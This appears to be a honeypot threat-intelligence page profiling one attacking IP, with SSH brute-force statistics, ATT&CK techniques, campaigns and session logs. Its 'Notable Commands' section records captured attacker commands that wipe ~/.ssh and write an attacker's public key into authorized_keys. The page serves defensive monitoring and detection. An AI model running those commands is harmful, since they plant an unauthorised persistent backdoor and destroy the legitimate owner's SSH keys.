IntrusionLabs IntrusionLabs
← Back to feed

45.61.52.18

Threat Confidence
60%
Location
🇺🇸 US / Los Angeles
ASN
AS36007 · Kamatera, Inc.
Cloud Provider
Total Events
374
Top 10% by volume
Agent Count
2
First / Last Seen
2026-03-31 22:34 — 2026-04-09 21:33
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Command and Control
T1105
External Corroboration
Not flagged by any external feeds
Campaigns
Multi-Agent Scan SCAN Active medium
156 IPs 285792 events
2026-04-06 — ongoing · 156 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
188 IPs 290814 events
2026-04-06 — ongoing · 188 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
151 IPs 266201 events
2026-03-08 — ongoing · 151 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
152 IPs 266974 events
2026-03-05 — ongoing · 152 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
83 IPs 242357 events
2026-03-02 — ongoing · 83 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
149 IPs 265769 events
2026-03-01 — ongoing · 149 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Session Forensics
malware_dropper ×14 credential_harvester ×29 opportunistic_bruter ×14
Sessions
57 (28 with login)
Avg Depth Score
0.55
Commands Executed
42
Files Downloaded
14
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
HASSH
03a80b21afa810682a776a7d42e5e6fb
SSH Client
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter 477edde95abe w4m_seattle_01 · 2026-04-10 20:39
1 50%
Loading events...
Malware Dropper f4e53303fc36 w4m_seattle_01 · 2026-04-10 20:39
3 1 1 100%
Loading events...
Credential Harvester ece373106c5a w4m_seattle_01 · 2026-04-10 20:39
1 35%
Loading events...
Credential Harvester b802d87bd069 w4m_singapore_01 · 2026-04-09 21:33
1 35%
Loading events...
Credential Harvester 3d1fd96c2887 w4m_singapore_01 · 2026-04-09 21:30
1 35%
Loading events...
Opportunistic Bruter 56e28c0e8c4c w4m_seattle_01 · 2026-04-08 08:29
1 50%
Loading events...
Malware Dropper 3b840c8b5dd6 w4m_seattle_01 · 2026-04-08 08:29
3 1 1 100%
Loading events...
Credential Harvester 458bbae48f64 w4m_seattle_01 · 2026-04-08 08:29
1 35%
Loading events...
Credential Harvester 5f0089ff0a6a w4m_seattle_01 · 2026-04-08 08:28
1 35%
Loading events...
Credential Harvester c71293f168fe w4m_seattle_01 · 2026-04-08 08:26
1 35%
Loading events...
Opportunistic Bruter d4ffdab3dd37 w4m_seattle_01 · 2026-04-08 08:25
1 50%
Loading events...
Malware Dropper 387d76c87401 w4m_seattle_01 · 2026-04-08 08:25
3 1 1 100%
Loading events...
Credential Harvester e8f0058949b4 w4m_seattle_01 · 2026-04-08 08:25
1 35%
Loading events...
Opportunistic Bruter 2c786f4d3e5f w4m_seattle_01 · 2026-04-08 08:23
1 50%
Loading events...
Malware Dropper 00c7837a4007 w4m_seattle_01 · 2026-04-08 08:23
3 1 1 100%
Loading events...
Credential Harvester 1e49e28cfa58 w4m_seattle_01 · 2026-04-08 08:23
1 35%
Loading events...
Credential Harvester 51859d4cf754 w4m_seattle_01 · 2026-04-08 08:21
1 35%
Loading events...
Credential Harvester ce2f040c5ba9 w4m_seattle_01 · 2026-04-08 08:20
1 35%
Loading events...
Opportunistic Bruter 1ac96085d49a w4m_seattle_01 · 2026-04-08 08:18
1 50%
Loading events...
Malware Dropper c6ea958ec1bf w4m_seattle_01 · 2026-04-08 08:18
3 1 1 100%
Loading events...
Credential Harvester 3f8fa79d9c56 w4m_seattle_01 · 2026-04-08 08:18
1 35%
Loading events...
Credential Harvester b87b3ae478ac w4m_seattle_01 · 2026-04-08 08:16
1 35%
Loading events...
Opportunistic Bruter 345780f0649e w4m_seattle_01 · 2026-04-08 08:15
1 50%
Loading events...
Malware Dropper c73fc52eace1 w4m_seattle_01 · 2026-04-08 08:15
3 1 1 100%
Loading events...
Credential Harvester ad2b57082f18 w4m_seattle_01 · 2026-04-08 08:15
1 35%
Loading events...
Opportunistic Bruter dea7d33b7182 w4m_seattle_01 · 2026-04-08 08:13
1 50%
Loading events...
Malware Dropper 9843a13a9bff w4m_seattle_01 · 2026-04-08 08:13
3 1 1 100%
Loading events...
Credential Harvester 9104b6d87ca6 w4m_seattle_01 · 2026-04-08 08:13
1 35%
Loading events...
Credential Harvester a3556e7be071 w4m_seattle_01 · 2026-04-08 08:12
1 35%
Loading events...
Opportunistic Bruter c0d5afc29263 w4m_seattle_01 · 2026-04-08 08:10
1 50%
Loading events...
Malware Dropper 1b469b36ac47 w4m_seattle_01 · 2026-04-08 08:10
3 1 1 100%
Loading events...
Credential Harvester 41ebe24ccf43 w4m_seattle_01 · 2026-04-08 08:10
1 35%
Loading events...
Credential Harvester 2469153b377b w4m_seattle_01 · 2026-04-08 08:09
1 35%
Loading events...
Credential Harvester 4bfea4ccd7f7 w4m_seattle_01 · 2026-04-08 08:07
1 35%
Loading events...
Opportunistic Bruter d0b11f7d5df0 w4m_seattle_01 · 2026-04-08 08:05
1 50%
Loading events...
Malware Dropper bf5bcd2aac91 w4m_seattle_01 · 2026-04-08 08:05
3 1 1 100%
Loading events...
Credential Harvester be8c9e53eefc w4m_seattle_01 · 2026-04-08 08:05
1 35%
Loading events...
Opportunistic Bruter 3b1debd9cc89 w4m_seattle_01 · 2026-04-08 08:04
1 50%
Loading events...
Malware Dropper 1631857e8e44 w4m_seattle_01 · 2026-04-08 08:04
3 1 1 100%
Loading events...
Credential Harvester 58cc6e093cd8 w4m_seattle_01 · 2026-04-08 08:04
1 35%
Loading events...
Opportunistic Bruter fdafa512214e w4m_seattle_01 · 2026-04-08 08:02
1 50%
Loading events...
Malware Dropper 45c7e3cac6a6 w4m_seattle_01 · 2026-04-08 08:02
3 1 1 100%
Loading events...
Credential Harvester e365bfffa7c3 w4m_seattle_01 · 2026-04-08 08:02
1 35%
Loading events...
Opportunistic Bruter 755ca26ca600 w4m_seattle_01 · 2026-04-08 08:01
1 50%
Loading events...
Malware Dropper 7cb727531f1b w4m_seattle_01 · 2026-04-08 08:00
3 1 1 100%
Loading events...
Credential Harvester 92337175230d w4m_seattle_01 · 2026-04-08 08:00
1 35%
Loading events...
Credential Harvester 16bb620127ef w4m_seattle_01 · 2026-04-08 07:59
1 35%
Loading events...
Opportunistic Bruter 04c6233ed4fd w4m_seattle_01 · 2026-04-08 07:57
1 50%
Loading events...
Malware Dropper f11dfe89ce9c w4m_seattle_01 · 2026-04-08 07:57
3 1 1 100%
Loading events...
Credential Harvester 5d67a71e1812 w4m_seattle_01 · 2026-04-08 07:57
1 35%
Loading events...